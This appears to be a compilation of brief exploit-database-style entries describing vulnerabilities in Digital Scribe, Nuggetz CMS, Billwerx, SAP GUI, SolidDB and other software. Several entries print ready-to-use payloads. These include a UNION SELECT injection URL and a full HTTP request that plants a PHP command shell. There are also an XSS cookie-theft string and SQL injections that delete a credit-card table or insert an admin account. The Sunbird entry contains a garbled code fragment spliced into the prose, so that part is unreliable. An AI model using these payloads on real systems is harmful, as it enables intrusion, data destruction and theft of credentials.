Digital Scribe version 1.4.1 is vulnerable to multiple SQL injection flaws. All but one of them require Magic Quotes GPC (php.ini) to be Off. An attacker can exploit this vulnerability by sending a malicious HTTP GET request to the vulnerable page. For example, http://site/path/stuworkdisplay.php?ID=-1) UNION ALL SELECT version(),user(),3,4,5,6,7,8,9,10,11%23
Mozilla Sunbird is a cross-platform calendar application built upon the Mozilla Toolkit. The main problem exists in the dtoa implementation. Sunbird has the same dtoa as Firefox, etc. The problem exists in the js3250.dll library (version 4.0.0 - Netscape 32-bit JavaScript Module) and it is the same as SREASONRES:20090625. We can create any number of floats, which will overwrite the memory. Kmax is defined as 15. The functions in dtoa do not check the Kmax limit, and it is possible to call 16>test.ics'); print myfile $header.$s.$expl.$footer;
The application oBlog is vulnerable to persistent XSS due to the lack of proper input filtering. The vulnerable code is present in the file /oBloG/inc/functions.php, where the function filter() does not escape HTML characters.
Nuggetz CMS 1.0 is vulnerable to remote code execution. The file ajaxsave.php is used to save any changes made to a nugget. The parameter 'nugget' is used to select the file, for example support.nugget, which is at /web_dir/data/. The changed values are written back to the respective nugget. The parameters 'pagevalue' and 'nugget' are not properly sanitized. It is possible to create or edit files on the web server, which allows creating a new file containing a PHP command shell (RCE). The following request creates shell.php at /nuggetz/: POST /nuggetz/nuggetz/admin/ajaxsave.php?nugget=../../shell.php%00 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: PHPSESSID=4m2iiqdt0q38cna2iemtfel7p3 Content-Type: application/x-www-form-urlencoded Content-Length: 45 pagevalue=<?php passthru($_GET['cmd']); ?> Shell Access: http://localhost/nuggetz/shell.php?cmd=dir
A remotely exploitable vulnerability was found in the database server core component. Exploitation of this bug does not require authentication and will lead to a remotely triggered denial of service of the database service. It is not likely that this bug could be otherwise exploited to compromise systems running vulnerable versions of SolidDB.
A regular employee can embed JavaScript code that could be executed within the context of the admin's browser. The user edits their own profile by going to 'http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2', places '<script>alert(document.cookie)</script>' into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country', and then gives the following link to the admin: http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2 The user could potentially log the admin's cookie and reset their own session, thus gaining administration access. For SQL injection, the 'description' POST value is unsanitized and can be exploited using ','1'); DELETE FROM credit_cards;/* or ','1'); insert into employees (username, password, firstname, lastname, email, admin) values ('hacker','hacker','hacker','hacker','hacker@hacker.com','1');/*
This exploit targets a buffer overflow vulnerability in the SAP GUI for Windows sapirrfc.dll ActiveX control. The vulnerability is triggered when the Accept() method is called with a large, specially crafted string. This causes a stack-based buffer overflow, which can be used to execute arbitrary code.
Easy RM to MP3 Converter 2.7.3.700 is vulnerable to a buffer overflow when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .m3u file. The vulnerability is caused by a boundary error when processing .m3u files. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted .m3u file with an overly long string.
This module exploits a stack buffer overflow in Xenorate 2.50. By creating a specially crafted xpl file, an attacker may be able to execute arbitrary code.
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. SQL injection occurs when web applications accept user input that is placed directly into a SQL statement and don't properly filter out dangerous characters. XPath injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.